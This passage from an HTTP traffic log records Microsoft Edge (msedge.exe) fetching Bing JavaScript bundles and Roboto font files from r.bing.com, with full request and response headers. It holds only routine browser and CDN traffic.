x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=195004
Expires: Mon, 07 Oct 2024 22:15:36 GMT
Date: Sat, 05 Oct 2024 16:05:32 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144332.f098f13
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/x6CS8glKlDAxrUISUqfsWELwuk8.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/x6CS8glKlDAxrUISUqfsWELwuk8.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 3963
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: JmFHQFiSwGoXwagcY8jQCA==
Last-Modified: Tue, 17 Sep 2024 10:12:52 GMT
ETag: 0x8DCD7014A44C75E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 81adcd98-a01e-00a3-6933-096169000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=53442
Expires: Sun, 06 Oct 2024 06:56:15 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f09917f
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/4rrrDiK2SXrlTjVU6cqmUwPcf4E.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/4rrrDiK2SXrlTjVU6cqmUwPcf4E.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 246
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: VxT4x5FC2RGynqu7o5ZkHA==
Last-Modified: Tue, 24 Sep 2024 05:48:11 GMT
ETag: 0x8DCDC5C79960B79
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2dcdc666-701e-003c-3cab-165e4b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=367997
Expires: Wed, 09 Oct 2024 22:18:50 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f09942a
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/dzSvQg5en-0RGfL_Yhu9mN2Zmog.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/dzSvQg5en-0RGfL_Yhu9mN2Zmog.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1594
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: cIC0B5HVFF+suEjK6LCHkw==
Last-Modified: Tue, 24 Sep 2024 06:43:55 GMT
ETag: 0x8DCDC644303A8DA
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 70b72167-101e-0063-4c35-15acb5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=207502
Expires: Tue, 08 Oct 2024 01:43:55 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f0995fb
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/mJUKbhysGPVV0f_zho_k3BkdtlU.gz.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/mJUKbhysGPVV0f_zho_k3BkdtlU.gz.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 265
Content-Type: text/javascript; charset=utf-8
Content-Encoding: gzip
Content-MD5: 8u8SHh8Zl2x2Dd4fQ+ehYQ==
Last-Modified: Tue, 24 Sep 2024 06:56:23 GMT
ETag: 0x8DCDC6600DE8558
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b5e7cd21-301e-0019-7aa0-14c6f8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=143471
Expires: Mon, 07 Oct 2024 07:56:44 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f099701
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rs/6s/vf/jnc,nj/Qp5q6DtDal0Q6zp3EOeEQbFTsW0.js?or=w

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rs/6s/vf/jnc,nj/Qp5q6DtDal0Q6zp3EOeEQbFTsW0.js?or=w HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1534
Content-Type: application/x-javascript; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Tue, 01 Nov 2022 12:19:17 GMT
X-EventID: 66cc0dd86f604a1691de4f3fd10c3255
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E051
X-AS-SuppressSetCookie: 1
Content-Security-Policy-Report-Only: script-src https: 'strict-dynamic' 'report-sample' 'nonce-7+KizOUI1L9CvCYCkiMCHr5ZZRDKZQoUiCuB7HaU3js='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=429614
Expires: Thu, 10 Oct 2024 15:26:04 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0998a4
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/n2FQtop8uqqg-oVOlp2QiedHTy0.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/n2FQtop8uqqg-oVOlp2QiedHTy0.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Last-Modified: Thu, 15 Sep 2022 21:38:39 GMT
ETag: 0x8DA9762A727C06F
Content-Type: text/javascript; charset=utf-8
Content-MD5: HMdNRu6Ml9f3B2WPhB2SOw==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 6391f28e-301e-007a-694a-1319ec000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 629
Cache-Control: public, no-transform, max-age=241689
Expires: Tue, 08 Oct 2024 11:13:59 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a270e
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/AsdMf7D6KLdP5SQOeuSIZtV8-sA.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/AsdMf7D6KLdP5SQOeuSIZtV8-sA.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Content-MD5: JuCBhPh6xDth0S/5BnDYIA==
Last-Modified: Tue, 02 Apr 2024 07:46:40 GMT
ETag: 0x8DC52E908D3E7D0
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d20957ab-b01e-007a-44b3-8f586a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Content-Encoding: gzip
Content-Length: 2047
Cache-Control: public, no-transform, max-age=140818
Expires: Mon, 07 Oct 2024 07:12:48 GMT
Date: Sat, 05 Oct 2024 16:05:50 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144350.f0a287a
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/sa/simg/Roboto_Semibold.woff2

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /sa/simg/Roboto_Semibold.woff2 HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Referer: https://r.bing.com/rs/5W/2VH/cir3,cc,nc/1KKUBDl-P5UnnMr4CFdIc4245kE.css?or=w
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 404 Not Found

Accept-Ranges: bytes
Content-Length: 10
Server: AkamaiNetStorage
Date: Sat, 05 Oct 2024 16:07:41 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144461.f0a2929
GET

https://r.bing.com/rp/w2ye0W2xVVGtLI2lFrOy9f7eTEE.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/w2ye0W2xVVGtLI2lFrOy9f7eTEE.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: script
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 307
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: uYmYFUgcuhFAiNUh9ZhLMg==
Last-Modified: Wed, 19 Jun 2024 21:05:15 GMT
ETag: 0x8DC90A3842B4ABD
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d3b0ff43-501e-0098-33dd-1324cd000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=59558
Expires: Sun, 06 Oct 2024 08:38:07 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f0972f8
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/sa/simg/Roboto_Regular.woff2

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /sa/simg/Roboto_Regular.woff2 HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
Origin: https://www.bing.com
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
DNT: 1
Accept: */*
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: font
Referer: https://r.bing.com/rs/5W/2VH/cir3,cc,nc/1KKUBDl-P5UnnMr4CFdIc4245kE.css?or=w
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 404 Not Found

Accept-Ranges: bytes
Content-Length: 10
Server: AkamaiNetStorage
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f0972fc
GET

https://r.bing.com/rp/iqYxm8r46lk-3ernDKEwdszk1wo.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/iqYxm8r46lk-3ernDKEwdszk1wo.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 270
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: TOEJswICO3Ck7rsyPnl7KQ==
Last-Modified: Tue, 24 Sep 2024 06:51:06 GMT
ETag: 0x8DCDC6543F69E89
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 5fddc0b4-401e-0034-56cf-154538000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=273425
Expires: Tue, 08 Oct 2024 20:02:35 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f097da7
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/OyRnaZe6gJ8kMXuak91zU0baVM4.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/OyRnaZe6gJ8kMXuak91zU0baVM4.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 250
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: FoisUan6I6x8k5j8xOd43Q==
Last-Modified: Tue, 24 Sep 2024 06:19:21 GMT
ETag: 0x8DCDC60D4123841
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b1470c7d-501e-0046-8002-163406000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=295403
Expires: Wed, 09 Oct 2024 02:08:53 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f09804c
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/x2emqXiwLnoij1FAO-zonC2BP_I.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/x2emqXiwLnoij1FAO-zonC2BP_I.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 581
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: U2R9x9AHf4iYT7ZMEDdtZw==
Last-Modified: Tue, 24 Sep 2024 07:12:56 GMT
ETag: 0x8DCDC68503BB79C
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 75ebdc29-901e-0036-3751-1547c2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=219493
Expires: Tue, 08 Oct 2024 05:03:43 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f09819c
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/fYa4G4wbz4PjD3tZaW3pycMuo2c.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/fYa4G4wbz4PjD3tZaW3pycMuo2c.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 510
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: hQdjDCHyrkihyogZmWzMPA==
Last-Modified: Tue, 24 Sep 2024 06:45:52 GMT
ETag: 0x8DCDC648875228E
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c133bbcc-601e-0045-1c38-163701000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=318440
Expires: Wed, 09 Oct 2024 08:32:51 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f0982ff
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/LLsqdhmv3RjYgfuepDBrVLeWshY.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/LLsqdhmv3RjYgfuepDBrVLeWshY.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 63
Content-Type: text/javascript; charset=utf-8
Content-Encoding: br
Content-MD5: Xvj0756XVlhYFsFZY4TuJg==
Last-Modified: Tue, 24 Sep 2024 06:13:41 GMT
ETag: 0x8DCDC6009620215
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 81809f2b-501e-0009-07aa-15f01e000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=257702
Expires: Tue, 08 Oct 2024 15:40:33 GMT
Date: Sat, 05 Oct 2024 16:05:31 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144331.f0984df
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Hdw3pI7FtFvJcOy2ZZvd6vlbAOU.br.js

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/Hdw3pI7FtFvJcOy2ZZvd6vlbAOU.br.js HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: */*
Origin: https://www.bing.com
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9

Response

HTTP/1.1 200 OK

Content-Length: 1292
